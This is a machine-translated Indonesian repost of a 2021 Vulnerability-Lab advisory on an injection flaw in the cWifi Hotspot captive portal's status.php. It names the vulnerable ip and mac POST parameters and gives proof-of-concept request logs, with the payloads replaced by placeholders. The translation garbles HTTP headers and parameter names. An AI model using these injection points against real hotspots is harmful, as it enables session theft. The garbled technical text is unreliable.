Eksekusi Kode CP Nirkabel Hotspot cWifi

  • Whatsapp
Eksekusi Kode CP Nirkabel Hotspot cWifi
Eksekusi Kode CP Nirkabel Hotspot cWifi

News.nextcloud.asia

Judul dokumen:
=================
cWifi Hotspot Wireless CP – Kerentanan Eksekusi Kode

Referensi (Sumber):
======================
https://www.vulnerability-lab.com/get_content.php?id=2310

Tanggal rilis:
===============
2021-12-15

ID Laboratorium Kerentanan (VL-ID):
======================================
2310

Sistem Skor Kerentanan Umum:
======================================
8.2

Kelas Kerentanan:
======================
Eksekusi Kode

Perkiraan Harga Saat Ini:
==========================
2.000€ – 3.000€

Informasi Penasehat Abstrak:
================================
Tim peneliti inti laboratorium kerentanan menemukan kerentanan eksekusi kode di Portal Captive Nirkabel Hotspot cWifi.

Produk yang Terpengaruh:
=====================
Produk: cWifi Hotspot Wireless Captive Portal – (PHP) (Aplikasi Web)

Garis Waktu Pengungkapan Kerentanan:
====================================
2021-12-15: Pengungkapan Publik (Laboratorium Kerentanan)

Status Penemuan:
===================
Diterbitkan

Operasi Teknis:
=========================
Terpencil

Tingkat Keparahan:
=================
Tinggi

Jenis Autentikasi:
======================
Otentikasi Terbatas (Hak Istimewa Tamu)

Interaksi pengguna:
===================
Tidak Ada Interaksi Pengguna

Jenis Pengungkapan:
==================
Riset Keamanan Independen

Detail & Deskripsi Teknis:
==================================
Kerentanan eksekusi kode telah ditemukan di aplikasi web portal captive nirkabel cWifi Hotspot resmi.
Kerentanan terletak di permintaan metode posting status login untuk spot-cwifi. Penyerang jarak jauh dapat menyuntikkan ip berbahaya sendiri dan
kredensial alamat mac dalam permintaan data metode pos. yang menghasilkan beberapa jenis kerentanan yang berbeda sehubungan dengan phpsessionid.
Penyerang dapat memprovokasi eksekusi kode skrip sisi klien melalui parameter mac atau ip dalam permintaan metode pos status. Dengan demikian memungkinkan penyerang
untuk mendapatkan akses ke koneksi wifi korban dan kredensial sesi untuk diakses. Masalahnya dapat diproses oleh penyerang jarak jauh penuh setelah terhubung
sebagai tamu atau anggota wifi. Parameter dalam permintaan metode posting tidak disanitasi dengan benar dan menghasilkan eksekusi sisi klien.

Metode Permintaan:
[+] POS

Modul Rentan:
[+] /v2/
[+] /keluar

File Rentan:
[+] status.php

Parameter Rentan:
[+] aku p
[+] Mac
[+] alamat

Bukti Konsep (PoC):
=========================
Kerentanan eksekusi kode kritis dapat dieksploitasi oleh penyerang jarak jauh dengan akses tamu atau oleh akun pengguna yang diautentikasi.
Untuk demonstrasi keamanan atau untuk mereproduksi kerentanan web, ikuti informasi dan langkah-langkah di bawah ini untuk melanjutkan.

Sumber Rentan: status.php (v2/status.php -http://spot.cwifi.de/status)

Alamat MAC: <[MALICIOUS INJECTED CODE EXECUTION!]>

Alamat IP:<[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>

Byte naik/turun:7,2 MiB/ 221,6 MiB

Waktu sesi:7m56s




–status keluar

Anda baru saja keluar

nama pengguna <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
Alamat IP <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
Alamat MAC <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
waktu sesi 4m12s
waktu yang tersisa 23j55m48s
byte atas/bawah: 49,1 KiB / 169,2 KiB


— Log Sesi PoC (POST) —
POST /v2/status.php HTTP/1.1
Tuan rumah: hotspot.cwifi.de
Konten-Panjang: 1129
Kontrol Tembolok: usia maks = 0
Detik-Ch-Ua: “Chromium”;v=”93″, ” Bukan;Merek”;v=”99″
Detik-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Windows”
Peningkatan-Permintaan-Tidak Aman: 1
Asal: http://spot.cwifi.de
Tipe Konten: application/x-www-form-urlencoded
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/93.0.4577.82 Safari/537.36
Terima: teks/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.9
Situs Pengambilan Detik: situs lintas
Sec-Fetch-Mode: navigasi
Detik-Ambil-Tujuan: dokumen
Referensi: http://spot.cwifi.de/
Terima-Encoding: gzip, deflate
Bahasa Terima: de-DE, de; q = 0.9, en-US; q = 0.8, en; q = 0.7
Koneksi: tutup

hostname=spot.cwifi.de&identity=Client2822&login-by=http-pap&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>%3A80&ssl-login=no
&server-name=Client2822_HotSpot&link-login=http%3A%2F%2Fspot.cwifi.de%2Flogin&link-login-only=http%3A%2F%2Fspot.cwifi.de%2Flogin
&link-logout=http%3A%2F%2Fspot.cwifi.de%2Flogout&link-status=http%3A%2F%2Fspot.cwifi.de%2Fstatus&link-orig=
&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&masuk=ya&mac=<[MALICIOUS INJECTED CODE!]>&percobaan=tidak&namapengguna=90%3ACC%3ADF%3A96%3AF6%3A59
&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=5j&idle-timeout-secs=18000&limit-bytes-in=&limit-bytes-out=&refresh-timeout=1m&refresh-timeout-secs=60
&session-timeout=23h52m4s&session-timeout-secs=85924&session-time-left=23h52m4s&session-time-left-secs=85924&uptime=7m56s&uptime-secs=476
&bytes-in=7591511&bytes-in-nice=7.2+MiB&bytes-out=232391459&bytes-out-nice=221.6+MiB&packets-in=154484&packets-out=172963&remain-bytes-in=
&remain-bytes-out=&session-id=&var=&error=&error-orig=&chap-id=%24%28chap-id%29&chap-challenge=%24%28chap-challenge%29&popup=%24%28popup%29
&advert-pending=no&http-status=%24%28http-status%29&http-header=%24%28http-header%29

HTTP/1.1 200 Oke
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: PHPSESSID=06u1m6qlhcp4tbuuapnq8du5c7; jalan =/
Kontrol Cache: tanpa penyimpanan, tanpa cache, harus divalidasi ulang
Bervariasi: Terima-Encoding
Konten-Panjang: 2137
Koneksi: tutup
Tipe-Konten: teks/html; rangkaian karakter = UTF-8
— melalui Login
https://hotspot.cwifi.de/v2/login.php
Tuan rumah: hotspot.cwifi.de
Terima: teks/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Terima-Bahasa: de, en-US; q = 0.7, en; q = 0.3
Terima-Encoding: gzip, deflate, br
Tipe Konten: application/x-www-form-urlencoded
Konten-Panjang: 1078
Asal: http://spot.cwifi.de
Koneksi: tetap hidup
Referensi: http://spot.cwifi.de/
Cookie: PHPSESSID=tvpvp06jktbs8hvgm8efh1eh33
Peningkatan-Permintaan-Tidak Aman: 1
Detik-Ambil-Tujuan: dokumen
Sec-Fetch-Mode: navigasi
Situs Pengambilan Detik: situs lintas
phone=&hostname=spot.cwifi.de&identity=Client2822&login-by=&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>:80&ssl-login=no&server-name=Client2822_HotSpot
&link-login=http://spot.cwifi.de/login&link-login-only=http://spot.cwifi.de/login&link-logout=http://spot.cwifi.de/logout&link-status=http: //spot.cwifi.de/status
&link-orig=&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&masuk=no&mac=<[MALICIOUS INJECTED CODE!]>&trial=tidak&namapengguna=
&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=&idle-timeout-secs=0
&limit-bytes-in=&limit-bytes-out=&refresh-timeout=&refresh-timeout-secs=0&session-timeout=&session-timeout-secs=0&session-time-left=&session-time-left-secs=0
&uptime=0s&uptime-secs=0&bytes-in=0&bytes-in-nice=0 B&bytes-out=0&bytes-out-nice=0 B&packets-in=0&packets-out=0&remain-bytes-in=&remain-bytes-out=&session- id=
&var=&error=&error-orig=&chap-id=244&chap-challenge=2765623021030016220234114113331227527435520051
&popup=true&advert-pending=no&http-status=$(http-status)&http-header=$(http-header)

POSTING: HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Kontrol Cache: tanpa penyimpanan, tanpa cache, harus divalidasi ulang
Bervariasi: Terima-Encoding
Pengodean Konten: gzip
Konten-Panjang: 334
Keep-Alive: batas waktu = 5, maks = 100
Koneksi: Keep-Alive
Tipe-Konten: teks/html; rangkaian karakter = UTF-8

Risiko keamanan:
================
Risiko keamanan kerentanan web eksekusi kode yang memungkinkan serangan oleh banyak vektor untuk mengganggu wifi diperkirakan tinggi.

Kredit & Penulis:
====================
Kerentanan-Lab [[email protected]]-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Penafian & Informasi:
===========================
Informasi yang diberikan dalam nasihat ini diberikan apa adanya tanpa jaminan apa pun. Vulnerability Lab menyangkal semua jaminan,
baik tersurat maupun tersirat, termasuk jaminan dapat diperjualbelikan dan kemampuan untuk tujuan tertentu. Kerentanan-Lab
atau pemasoknya tidak bertanggung jawab dalam setiap kasus kerusakan, termasuk kerugian langsung, tidak langsung, insidental, konsekuensial dari keuntungan bisnis
atau kerusakan khusus, bahkan jika Vulnerability-Lab atau pemasoknya telah diberitahu tentang kemungkinan kerusakan tersebut. Beberapa negara bagian melakukannya
tidak mengizinkan pengecualian atau pembatasan tanggung jawab atas kerusakan konsekuensial atau insidental sehingga pembatasan di atas mungkin tidak berlaku.
Kami tidak menyetujui atau mendorong siapa pun untuk melanggar lisensi, kebijakan, merusak situs web, meretas basis data, atau berdagang dengan data curian.

Domain: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com

Setiap salinan atau reproduksi yang dimodifikasi, termasuk penggunaan sebagian, dari file ini memerlukan otorisasi dari Laboratorium Kerentanan.
Izin untuk mendistribusikan ulang peringatan ini secara elektronik dalam bentuk yang tidak dimodifikasi diberikan. Semua hak lainnya, termasuk penggunaan hak lainnya
media, dicadangkan oleh Vulnerability-Lab Research Team atau pemasoknya. Semua gambar, teks, nasihat, kode sumber, video, dan lainnya
informasi di situs web ini adalah merek dagang dari tim lab kerentanan & penulis atau manajer tertentu. Untuk merekam, membuat daftar, memodifikasi, menggunakan atau
edit kontak materi kami ([email protected] atau [email protected]) untuk meminta izin.

Hak Cipta © 2021 | Laboratorium Kerentanan – [Evolution Security GmbH]™


LABORATORIUM KERENTANAN (LABORATORIUM KERENTANAN)
PENELITIAN, BUG BOUNTY & PENGUNGKAPAN BERTANGGUNG JAWAB

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *